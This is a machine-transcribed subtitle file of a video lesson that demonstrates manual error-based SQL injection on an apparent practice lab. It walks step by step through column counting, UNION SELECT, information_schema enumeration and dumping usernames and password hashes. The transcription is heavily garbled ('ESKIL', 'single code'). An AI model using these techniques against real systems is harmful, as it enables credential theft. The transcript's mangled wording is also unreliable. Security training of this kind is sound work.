Would you like to inspect the original subtitles? These are the user uploaded subtitles that are being translated: 1 00:00:00,530 --> 00:00:09,110 Now let's discuss how this terrorist is killing action can be exploited in a way, I'm here at the ESKIL 2 00:00:09,110 --> 00:00:14,150 injection option, which is an editor based ESKIL injection challenge. 3 00:00:14,930 --> 00:00:20,570 We can use either the select item called option or the search option. 4 00:00:21,170 --> 00:00:24,780 I'm going to use this search option for this exercise. 5 00:00:25,400 --> 00:00:29,500 So let's first and third one and click submit and see what happens. 6 00:00:32,190 --> 00:00:40,620 OK, so it is showing some results for the item 81, let's enter two and see what happens. 7 00:00:42,630 --> 00:00:42,960 OK. 8 00:00:43,000 --> 00:00:46,710 Seems like there are no items for the lady to now. 9 00:00:46,890 --> 00:00:54,330 Let's end the one and single cord and let's click submit and look at that. 10 00:00:54,390 --> 00:01:02,610 There is an error here which says that call to a member function under assault on a non object in home 11 00:01:02,610 --> 00:01:04,820 not be on line 65. 12 00:01:05,490 --> 00:01:10,760 When you see this fetch under hassock, it is most likely and Eskil error. 13 00:01:11,610 --> 00:01:17,650 So probably the single code that we have injected is causing this ESKIL error. 14 00:01:18,390 --> 00:01:21,720 Let's try to understand what might have happened in the background. 15 00:01:22,440 --> 00:01:25,050 Let me open Mousepad to explain this. 16 00:01:36,230 --> 00:01:47,170 Here it is now, possibly this is the banking query, select start from some people name. 17 00:01:48,170 --> 00:01:55,500 I assume it is Cepheid because when you entered one, it is showing some coffee related images and description. 18 00:01:56,060 --> 00:02:08,490 So I chose my people as caffeine where the item highly of the item called equals something. 19 00:02:09,320 --> 00:02:10,870 So this is the existing query. 20 00:02:10,910 --> 00:02:11,930 That's what I'm assuming. 21 00:02:12,290 --> 00:02:13,520 Not when you enter one. 22 00:02:13,910 --> 00:02:18,500 It has perfectly executed and it has shown us the results. 23 00:02:19,100 --> 00:02:26,330 But when we entered one and single called, it has thrown an error, possibly because one single code 24 00:02:26,330 --> 00:02:32,750 is open here and one single code is closed and there is one more single code that is left unclosed. 25 00:02:33,470 --> 00:02:37,520 So possibly because of that, there was an obscure error. 26 00:02:38,090 --> 00:02:43,910 We can confirm if the error is caused by our single court by adding one more single code. 27 00:02:44,510 --> 00:02:45,320 What will happen? 28 00:02:45,320 --> 00:02:49,280 There is one single code is opened and one single code is closed. 29 00:02:49,880 --> 00:02:56,900 And because we are adding an additional single code, it is going to close the existing unclosed single 30 00:02:56,900 --> 00:02:57,310 code. 31 00:02:58,070 --> 00:03:02,480 So let's try to add another single code and see if the error is gone. 32 00:03:03,290 --> 00:03:06,710 If it is gone, that means our analogy is correct. 33 00:03:06,710 --> 00:03:10,190 And this application is one level, the sequel injection. 34 00:03:14,240 --> 00:03:18,050 So I'm just adding one and two single quotes. 35 00:03:19,050 --> 00:03:22,320 Clicking submit and look at that. 36 00:03:22,590 --> 00:03:29,640 There is no at this time now just to confirm that this is happening because of sequel action, let's 37 00:03:29,640 --> 00:03:36,240 add one more single code, making it a total of three single quotes and see if the error comes back, 38 00:03:36,240 --> 00:03:39,720 because there will be one single code left unclosed. 39 00:03:40,740 --> 00:03:44,550 OK, so I'm just entering one and three single quotes. 40 00:03:45,090 --> 00:03:46,110 Let's click submit. 41 00:03:47,310 --> 00:03:48,180 And there it is. 42 00:03:48,630 --> 00:03:51,030 There is a miniscule error once again. 43 00:03:51,240 --> 00:03:56,220 So this confirms that the application is vulnerable to sequel injection. 44 00:03:57,010 --> 00:03:59,460 Now, this confirms that the application is vulnerable. 45 00:03:59,970 --> 00:04:01,230 Now, what is the next step? 46 00:04:01,460 --> 00:04:07,420 We want to exploit it and extract information from the database to do that. 47 00:04:07,620 --> 00:04:09,570 There are few steps that we need to do here. 48 00:04:10,170 --> 00:04:16,380 The first step is to obtain the number of columns that are being used by the query that is written in 49 00:04:16,380 --> 00:04:17,000 the background. 50 00:04:17,550 --> 00:04:20,970 There is a reason for doing that, which I'll explain in a moment. 51 00:04:21,690 --> 00:04:28,950 But to identify the number of columns, we can simply use the same query 52 00:04:33,510 --> 00:04:36,620 and write an order by statement. 53 00:04:39,030 --> 00:04:46,170 So what we are going to do is we are going to write order by one and we are just commenting on everything 54 00:04:46,170 --> 00:04:52,330 after order by one so that the single code that is left unclosed will not cause any error. 55 00:04:53,040 --> 00:04:59,130 So we are closing the existing single code by using a single code after one. 56 00:04:59,520 --> 00:05:02,570 And we are writing our own ESKIL statements here. 57 00:05:03,360 --> 00:05:10,470 What order by one will do is it is going to try to order the results based on the column number one. 58 00:05:11,100 --> 00:05:15,980 If column number one exists, there won't be any error and the data will be sorted. 59 00:05:16,470 --> 00:05:17,480 So that's the idea. 60 00:05:18,030 --> 00:05:21,350 If the column doesn't exist, it is going to throw an error. 61 00:05:21,840 --> 00:05:25,970 So we will have to increment this number until we get an error. 62 00:05:26,160 --> 00:05:31,140 So we will get a conclusion that that specific column doesn't exist in the database. 63 00:05:31,590 --> 00:05:32,530 So that's the idea. 64 00:05:32,550 --> 00:05:33,870 So let's go ahead. 65 00:05:34,890 --> 00:05:43,890 I'm going to copy this from one till the hash and let's enter this in the search field. 66 00:05:46,270 --> 00:05:47,290 Let's click submit. 67 00:05:48,670 --> 00:05:53,850 Lawyer, let's incremented this one and click submit again. 68 00:05:55,410 --> 00:05:56,290 There is no letter. 69 00:05:56,970 --> 00:05:59,540 Let's make it five and see what happens. 70 00:06:01,030 --> 00:06:02,500 Once again, there is no leader. 71 00:06:03,010 --> 00:06:04,620 Let's make it eight. 72 00:06:06,550 --> 00:06:10,880 There is an error, which means eight column doesn't exist. 73 00:06:11,380 --> 00:06:12,430 Let's make it seven. 74 00:06:15,370 --> 00:06:20,350 Later, this confirms that the table has seven columns. 75 00:06:27,340 --> 00:06:34,540 Identifying this number of columns is required because in the next step, we are going to use a union 76 00:06:34,540 --> 00:06:41,520 statement, a union statement can be used with two different Sellick statements on both sides. 77 00:06:42,100 --> 00:06:47,230 Now, on both the sides, the number of columns in the select statements have to be equal. 78 00:06:48,010 --> 00:06:49,730 Let me show you how that looks like. 79 00:06:51,310 --> 00:06:52,810 I'm going to copy this first. 80 00:06:57,290 --> 00:07:05,840 And I'm going to sit here and instead of either buy one, I'm going to write a union statement. 81 00:07:06,860 --> 00:07:13,430 And as I mentioned, the union statement allows you to write silly statements on board the sites. 82 00:07:14,090 --> 00:07:18,910 So these Sellick statements should have the same number of columns. 83 00:07:19,400 --> 00:07:27,290 So on the right side, I'm giving one, two, three, four, five, six and seven. 84 00:07:27,620 --> 00:07:32,720 Since we obtained the number of columns on the left hand side in the previous step, we are able to 85 00:07:32,720 --> 00:07:36,130 give the number of columns on the right hand side in this step. 86 00:07:36,530 --> 00:07:41,210 That's exactly the reason why we identified the number of columns in the previous step. 87 00:07:41,990 --> 00:07:49,640 OK, so since it is an editor based school, in addition, if one of these numbers are displayed back 88 00:07:49,640 --> 00:07:56,740 on the screen, we can basically use that display number to retrieve further information from the database. 89 00:07:57,170 --> 00:08:05,990 So let's copy this and inserted into the search field and hope for some number being displayed back. 90 00:08:10,460 --> 00:08:13,640 I'm pasting it here and let's click submit. 91 00:08:15,270 --> 00:08:22,440 And there are a bunch of numbers here, two, four, five and six, we can use any of these numbers 92 00:08:22,710 --> 00:08:25,470 to retrieve information from the database. 93 00:08:25,950 --> 00:08:36,810 So to do that, I'm going to first copy this line here and let's start here and let's probably use the 94 00:08:36,810 --> 00:08:39,120 number five, which is displayed back. 95 00:08:39,780 --> 00:08:48,090 So instead of five, I'm going to use a database off so we can just copy this. 96 00:08:48,390 --> 00:08:53,370 And if everything goes fine, we should get the name of the database. 97 00:08:58,430 --> 00:09:02,100 So just watch out for this number five here and see what happens. 98 00:09:02,450 --> 00:09:03,140 Click submit. 99 00:09:04,920 --> 00:09:12,120 Look at that instead of number five, we are getting the name of the database and the rest of the numbers 100 00:09:12,120 --> 00:09:13,350 are there as is. 101 00:09:14,190 --> 00:09:16,320 OK, now let's go back. 102 00:09:17,100 --> 00:09:20,610 And we have gotten the name of the database. 103 00:09:21,870 --> 00:09:24,240 Now, once again, I'm just going to copied 104 00:09:27,180 --> 00:09:37,220 and pasted here and we can also get the version as well as the name of the user being used. 105 00:09:37,620 --> 00:09:39,150 So let's do it one by one. 106 00:09:39,430 --> 00:09:41,610 First, let's try to get the version. 107 00:09:49,680 --> 00:09:56,130 As you can see, the audition is this it also contains the version of the Obama server, which is 14 108 00:09:56,130 --> 00:09:57,270 of four in this case. 109 00:10:00,330 --> 00:10:06,240 Now, the best part is we just don't need to stick to one column, since the other columns are also 110 00:10:06,240 --> 00:10:13,670 being displayed by, for example, column number two, we can use this for displaying the user information. 111 00:10:14,310 --> 00:10:16,280 So I'm just going to copy it once again. 112 00:10:21,990 --> 00:10:27,810 And I'll post it here and let slip submit. 113 00:10:29,080 --> 00:10:36,480 Now look at that, instead of the number two, we are getting the username of the mythical database, 114 00:10:36,810 --> 00:10:38,510 which is the root in this case. 115 00:10:39,090 --> 00:10:41,610 And let's go ahead and pasted here. 116 00:10:44,860 --> 00:10:49,950 OK, so we have Gordon bought the username as well as the database version. 117 00:10:50,680 --> 00:10:58,930 Now the next step is to identify the table names of names. 118 00:11:00,020 --> 00:11:05,920 And once we get these two, we can actually get the actual data that is stored in the papers. 119 00:11:06,460 --> 00:11:11,420 So the database contains tables, tables contain columns and data. 120 00:11:11,980 --> 00:11:14,650 That's the reason why we are going in this audit. 121 00:11:15,250 --> 00:11:20,350 So the next step is to find out the list of tables that are available in the database. 122 00:11:21,910 --> 00:11:27,910 So I'm just going to copy this line once again, and it's posted here. 123 00:11:29,090 --> 00:11:37,660 Now, let's just replace this user with two and let's use this five for retrieving the table names. 124 00:11:38,500 --> 00:11:44,580 I'm going to use the table underscored name, which is a predefined variable kind of thing. 125 00:11:44,740 --> 00:11:49,480 You shouldn't change this because all the tables will be retrieved using this table. 126 00:11:49,480 --> 00:11:59,440 Underscore name and the table names or any other metadata in my sequel is stored in a special database 127 00:11:59,440 --> 00:12:07,330 called Information Underscore Schema, and the table names can be accessed by using DOT. 128 00:12:08,590 --> 00:12:11,680 So we are going to use this to retrieve table names. 129 00:12:11,980 --> 00:12:13,660 I'm copying this payload here. 130 00:12:15,130 --> 00:12:18,580 And let's go back and let's face it here. 131 00:12:21,910 --> 00:12:29,020 Now, it has dumped a lot of people names, and what we are interested in is some custom tables which 132 00:12:29,020 --> 00:12:31,510 may contain user specific information. 133 00:12:32,230 --> 00:12:39,610 So let's search for tables with the word user name typing users. 134 00:12:41,460 --> 00:12:47,730 There it is, there is a table named uses and looks like that's the end of it, so most likely it is 135 00:12:47,730 --> 00:12:49,220 a user defined table. 136 00:12:49,740 --> 00:12:50,820 So I'm copying this. 137 00:12:51,270 --> 00:12:56,870 And let's go back to the notepad and let's use this information here. 138 00:12:57,450 --> 00:13:01,540 So use this table is what we are interested in now. 139 00:13:01,860 --> 00:13:10,560 Once again, let me just copy this whole line and pasted here and this time. 140 00:13:12,170 --> 00:13:19,640 We want to dump the column names for this table users to dump the column names we can just replace, 141 00:13:20,540 --> 00:13:26,870 they will underscore name with column, underscore name, and the information underscores Qimonda. 142 00:13:26,900 --> 00:13:31,330 Columns should be used here because this is what is going to contain the column names. 143 00:13:32,000 --> 00:13:34,130 So once again, I'm copying this. 144 00:13:37,990 --> 00:13:38,560 And. 145 00:13:40,420 --> 00:13:45,640 I'm going to start here and let's click submit. 146 00:13:47,790 --> 00:13:54,900 If you notice, there are a lot of columns I will use a stable, having all of these columns is highly 147 00:13:54,900 --> 00:13:55,500 unlikely. 148 00:13:56,190 --> 00:14:04,050 So what's happening here is the query that we have inserted is dumping all the columns from information 149 00:14:04,050 --> 00:14:06,780 underscore schema, which is not required by us. 150 00:14:07,230 --> 00:14:11,470 Now, what we are interested in is the column names only from this user's table. 151 00:14:12,060 --> 00:14:19,950 So let's add a filter here, saying we're table underscored name is uses. 152 00:14:21,930 --> 00:14:24,420 OK, so let's copy this payload 153 00:14:27,510 --> 00:14:36,240 and let's face it again, let's click submit and there it is. 154 00:14:36,750 --> 00:14:43,520 Interestingly, there are only three columns in this table uid username and password. 155 00:14:44,250 --> 00:14:46,410 So let's knock them down. 156 00:14:48,910 --> 00:14:57,120 Username, password Eweida, these are the three columns we identified from Users Table. 157 00:14:57,760 --> 00:15:01,240 Now the last step is to extract these details. 158 00:15:01,810 --> 00:15:08,170 So let's modify our payload a bit so that we can extract the usernames and passwords from the user's 159 00:15:08,170 --> 00:15:08,560 table. 160 00:15:11,230 --> 00:15:17,520 OK, the first thing that I'm going to do is I will just remove this information underscores Quemada 161 00:15:17,600 --> 00:15:20,280 columns because we are not looking for metadata anymore. 162 00:15:20,650 --> 00:15:23,200 We are looking for the actual data stored in the table. 163 00:15:23,800 --> 00:15:27,910 So we want to retrieve data from a user's table. 164 00:15:28,780 --> 00:15:34,270 And instead of calling them, we want the actual data and we know the call them names. 165 00:15:34,300 --> 00:15:42,070 So we will just use UID username password. 166 00:15:43,060 --> 00:15:49,060 But if you notice, we are actually using more than seven columns here because we are just using these 167 00:15:49,060 --> 00:15:51,090 three as three different columns. 168 00:15:51,670 --> 00:15:58,180 Instead we can just click all of them and concatenate into one column for that. 169 00:15:58,180 --> 00:16:06,730 I can use group underscore contact and when this information is displayed on the Web page, I want these 170 00:16:06,730 --> 00:16:09,760 details to be separated by a column like this. 171 00:16:10,210 --> 00:16:15,810 So for that, I'm going to use a hex value to specify that the column has to be displayed. 172 00:16:16,390 --> 00:16:21,280 So zero x three here and zero x3 here. 173 00:16:21,940 --> 00:16:28,390 So this payload should dump all the data that we are expecting some just going to copy my payload to 174 00:16:28,390 --> 00:16:29,580 be injected once again. 175 00:16:31,780 --> 00:16:33,460 And let's face it there. 176 00:16:40,530 --> 00:16:48,150 There it is, if you notice, we have got in the UAE one which is admin and there is a password hash, 177 00:16:48,450 --> 00:16:51,660 similarly xvid we a password hash. 178 00:16:52,140 --> 00:16:57,500 There is a third user with the name user and he has a password hash password. 179 00:16:58,110 --> 00:16:59,910 So let's copy all of this. 180 00:17:05,140 --> 00:17:06,610 And paste here. 181 00:17:07,270 --> 00:17:12,040 So this is the list of credentials that we have extracted from the table now. 182 00:17:12,400 --> 00:17:14,800 The passports are not in clear text. 183 00:17:14,890 --> 00:17:17,470 They are stored in hashed format, which is good. 184 00:17:17,920 --> 00:17:23,820 But if these hashes are generated using a weak hashing algorithm, they can be easily cracked. 185 00:17:24,280 --> 00:17:31,570 The purpose of this demo is only to show you how to exploit error based sequel injection by using manual 186 00:17:31,570 --> 00:17:34,260 techniques and without using any automated tools. 187 00:17:34,750 --> 00:17:38,680 So cracking these hashes is something which we will discuss later. 188 00:17:39,640 --> 00:17:46,410 I hope you have enjoyed this exercise of exploiting error based sequel injections in later videos. 189 00:17:46,420 --> 00:17:51,900 We are also going to discuss how we can use automated tools to exploit sequel injection. 190 00:17:52,420 --> 00:17:53,740 So that's all for this video. 191 00:17:54,010 --> 00:17:55,140 See you in the next one. 20080